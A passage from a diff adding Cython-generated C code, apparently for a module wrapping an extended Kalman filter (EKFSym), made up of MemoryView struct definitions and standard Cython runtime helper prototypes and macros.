EKFS::EKFSym *ekf; +}; + + +/* "View.MemoryView":114 + * @cython.collection_type("sequence") + * @cname("__pyx_array") + * cdef class array: # <<<<<<<<<<<<<< + * + * cdef: + */ +struct __pyx_array_obj { + PyObject_HEAD + struct __pyx_vtabstruct_array *__pyx_vtab; + char *data; + Py_ssize_t len; + char *format; + int ndim; + Py_ssize_t *_shape; + Py_ssize_t *_strides; + Py_ssize_t itemsize; + PyObject *mode; + PyObject *_format; + void (*callback_free_data)(void *); + int free_data; + int dtype_is_object; +}; + + +/* "View.MemoryView":302 + * + * @cname('__pyx_MemviewEnum') + * cdef class Enum(object): # <<<<<<<<<<<<<< + * cdef object name + * def __init__(self, name): + */ +struct __pyx_MemviewEnum_obj { + PyObject_HEAD + PyObject *name; +}; + + +/* "View.MemoryView":337 + * + * @cname('__pyx_memoryview') + * cdef class memoryview: # <<<<<<<<<<<<<< + * + * cdef object obj + */ +struct __pyx_memoryview_obj { + PyObject_HEAD + struct __pyx_vtabstruct_memoryview *__pyx_vtab; + PyObject *obj; + PyObject *_size; + PyObject *_array_interface; + PyThread_type_lock lock; + __pyx_atomic_int_type acquisition_count; + Py_buffer view; + int flags; + int dtype_is_object; + __Pyx_TypeInfo *typeinfo; +}; + + +/* "View.MemoryView":952 + * @cython.collection_type("sequence") + * @cname('__pyx_memoryviewslice') + * cdef class _memoryviewslice(memoryview): # <<<<<<<<<<<<<< + * "Internal class for passing memoryview slices to Python" + * + */ +struct __pyx_memoryviewslice_obj { + struct __pyx_memoryview_obj __pyx_base; + __Pyx_memviewslice from_slice; + PyObject *from_object; + PyObject *(*to_object_func)(char *); + int (*to_dtype_func)(char *, PyObject *); +}; + + + +/* "View.MemoryView":114 + * @cython.collection_type("sequence") + * @cname("__pyx_array") + * cdef class array: # <<<<<<<<<<<<<< + * + * cdef: + */ + +struct __pyx_vtabstruct_array { + PyObject *(*get_memview)(struct __pyx_array_obj *); +}; +static struct __pyx_vtabstruct_array *__pyx_vtabptr_array; + + +/* "View.MemoryView":337 + * + * @cname('__pyx_memoryview') + * cdef class memoryview: # <<<<<<<<<<<<<< + * + * cdef object obj + */ + +struct __pyx_vtabstruct_memoryview { + char *(*get_item_pointer)(struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*is_slice)(struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*setitem_slice_assignment)(struct __pyx_memoryview_obj *, PyObject *, PyObject *); + PyObject *(*setitem_slice_assign_scalar)(struct __pyx_memoryview_obj *, struct __pyx_memoryview_obj *, PyObject *); + PyObject *(*setitem_indexed)(struct __pyx_memoryview_obj *, PyObject *, PyObject *); + PyObject *(*convert_item_to_object)(struct __pyx_memoryview_obj *, char *); + PyObject *(*assign_item_from_object)(struct __pyx_memoryview_obj *, char *, PyObject *); + PyObject *(*_get_base)(struct __pyx_memoryview_obj *); +}; +static struct __pyx_vtabstruct_memoryview *__pyx_vtabptr_memoryview; + + +/* "View.MemoryView":952 + * @cython.collection_type("sequence") + * @cname('__pyx_memoryviewslice') + * cdef class _memoryviewslice(memoryview): # <<<<<<<<<<<<<< + * "Internal class for passing memoryview slices to Python" + * + */ + +struct __pyx_vtabstruct__memoryviewslice { + struct __pyx_vtabstruct_memoryview __pyx_base; +}; +static struct __pyx_vtabstruct__memoryviewslice *__pyx_vtabptr__memoryviewslice; +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* ArgTypeTest.proto */ +#define __Pyx_ArgTypeTest(obj, type, none_allowed, name, exact)\ + ((likely(__Pyx_IS_TYPE(obj, type) | (none_allowed && (obj == Py_None)))) ? 1 :\ + __Pyx__ArgTypeTest(obj, type, name, exact)) +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact); + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* RaiseUnexpectedTypeError.proto */ +static int __Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj); + +/* GCCDiagnostics.proto */ +#if !defined(__INTEL_COMPILER) && defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 6)) +#define __Pyx_HAS_GCC_DIAGNOSTIC +#endif + +/* BuildPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_BuildFromAscii(Py_ssize_t ulength, char* chars, int clength, + int prepend_sign, char padding_char); + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_int(int value, Py_ssize_t width, char padding_char, char format_char); + +/* CIntToPyUnicode.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_Py_ssize_t(Py_ssize_t value, Py_ssize_t width, char padding_char, char format_char); + +/* JoinPyUnicode.proto */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char); + +/* StrEquals.proto */ +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyString_Equals __Pyx_PyUnicode_Equals +#else +#define __Pyx_PyString_Equals __Pyx_PyBytes_Equals +#endif + +/* PyObjectFormatSimple.proto */ +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#elif PY_MAJOR_VERSION < 3 + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyString_CheckExact(s)) ? PyUnicode_FromEncodedObject(s, NULL, "strict") :\ + PyObject_Format(s, f)) +#elif CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyLong_CheckExact(s)) ? PyLong_Type.tp_repr(s) :\ + likely(PyFloat_CheckExact(s)) ? PyFloat_Type.tp_repr(s) :\ + PyObject_Format(s, f)) +#else + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#endif + +CYTHON_UNUSED static int __pyx_array_getbuffer(PyObject *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /*proto*/ +static PyObject *__pyx_array_get_memview(struct __pyx_array_obj *); /*proto*/ +/* GetAttr.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *, PyObject *); + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* ObjectGetItem.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key); +#else +#define __Pyx_PyObject_GetItem(obj, key) PyObject_GetItem(obj, key) +#endif + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* DivInt[Py_ssize_t].proto */ +static CYTHON_INLINE Py_ssize_t __Pyx_div_Py_ssize_t(Py_ssize_t, Py_ssize_t); + +/* UnaryNegOverflows.proto */ +#define __Pyx_UNARY_NEG_WOULD_OVERFLOW(x)\ + (((x) < 0) & ((unsigned long)(x) == 0-(unsigned long)(x))) + +/* GetAttr3.proto */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *, PyObject *, PyObject *); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* GetModuleGlobalName.proto */ +#if CYTHON_USE_DICT_VERSIONS +#define __Pyx_GetModuleGlobalName(var, name) do {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + (var) = (likely(__pyx_dict_version == __PYX_GET_DICT_VERSION(__pyx_d))) ?\ + (likely(__pyx_dict_cached_value) ? __Pyx_NewRef(__pyx_dict_cached_value) : __Pyx_GetBuiltinName(name)) :\ + __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +#define __Pyx_GetModuleGlobalNameUncached(var, name) do {\ + PY_UINT64_T __pyx_dict_version;\ + PyObject *__pyx_dict_cached_value;\ + (var) = __Pyx__GetModuleGlobalName(name, &__pyx_dict_version, &__pyx_dict_cached_value);\ +} while(0) +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value); +#else +#define __Pyx_GetModuleGlobalName(var, name) (var) = __Pyx__GetModuleGlobalName(name) +#define __Pyx_GetModuleGlobalNameUncached(var, name) (var) = __Pyx__GetModuleGlobalName(name) +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name); +#endif + +/* AssertionsEnabled.proto */ +#define __Pyx_init_assertions_enabled() +#if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX < 0x02070600 && !defined(Py_OptimizeFlag) + #define __pyx_assertions_enabled() (1) +#elif PY_VERSION_HEX < 0x03080000 || CYTHON_COMPILING_IN_PYPY || defined(Py_LIMITED_API) + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#elif CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030900A6 + static int __pyx_assertions_enabled_flag; + #define __pyx_assertions_enabled() (__pyx_assertions_enabled_flag) + #undef __Pyx_init_assertions_enabled + static void __Pyx_init_assertions_enabled(void) { + __pyx_assertions_enabled_flag = ! _PyInterpreterState_GetConfig(__Pyx_PyThreadState_Current->interp)->optimization_level; + } +#else + #define __pyx_assertions_enabled() (!Py_OptimizeFlag) +#endif + +/* RaiseTooManyValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected); + +/* RaiseNeedMoreValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index); + +/* RaiseNoneIterError.proto */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void); + +/* ExtTypeTest.proto */ +static CYTHON_INLINE int __Pyx_TypeTest(PyObject *obj, PyTypeObject *type); + +/* GetTopmostException.proto */ +#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE +static _PyErr_StackItem * __Pyx_PyErr_GetTopmostException(PyThreadState *tstate); +#endif + +/* SaveResetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSave(type, value, tb) __Pyx__ExceptionSave(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#define __Pyx_ExceptionReset(type, value, tb) __Pyx__ExceptionReset(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +#else +#define __Pyx_ExceptionSave(type, value, tb) PyErr_GetExcInfo(type, value, tb) +#define __Pyx_ExceptionReset(type, value, tb) PyErr_SetExcInfo(type, value, tb) +#endif + +/* GetException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_GetException(type, value, tb) __Pyx__GetException(__pyx_tstate, type, value, tb) +static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* SwapException.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_ExceptionSwap(type, value, tb) __Pyx__ExceptionSwap(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#else +static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb); +#endif + +/* Import.proto */ +static PyObject *__Pyx_Import(PyObject *name, PyObject *from_list, int level); + +/* ImportDottedModule.proto */ +static PyObject *__Pyx_ImportDottedModule(PyObject *name, PyObject *parts_tuple); +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_ImportDottedModule_WalkParts(PyObject *module, PyObject *name, PyObject *parts_tuple); +#endif + +/* ssize_strlen.proto */ +static CYTHON_INLINE Py_ssize_t __Pyx_ssize_strlen(const char *s); + +/* FastTypeChecks.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_TypeCheck(obj, type) __Pyx_IsSubtype(Py_TYPE(obj), (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) __Pyx_IsAnySubtype2(Py_TYPE(obj), (PyTypeObject *)type1, (PyTypeObject *)type2) +static CYTHON_INLINE int __Pyx_IsSubtype(PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_IsAnySubtype2(PyTypeObject *cls, PyTypeObject *a, PyTypeObject *b); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches(PyObject *err, PyObject *type); +static CYTHON_INLINE int __Pyx_PyErr_GivenExceptionMatches2(PyObject *err, PyObject *type1, PyObject *type2); +#else +#define __Pyx_TypeCheck(obj, type) PyObject_TypeCheck(obj, (PyTypeObject *)type) +#define __Pyx_TypeCheck2(obj, type1, type2) (PyObject_TypeCheck(obj, (PyTypeObject *)type1) || PyObject_TypeCheck(obj, (PyTypeObject *)type2)) +#define __Pyx_PyErr_GivenExceptionMatches(err, type) 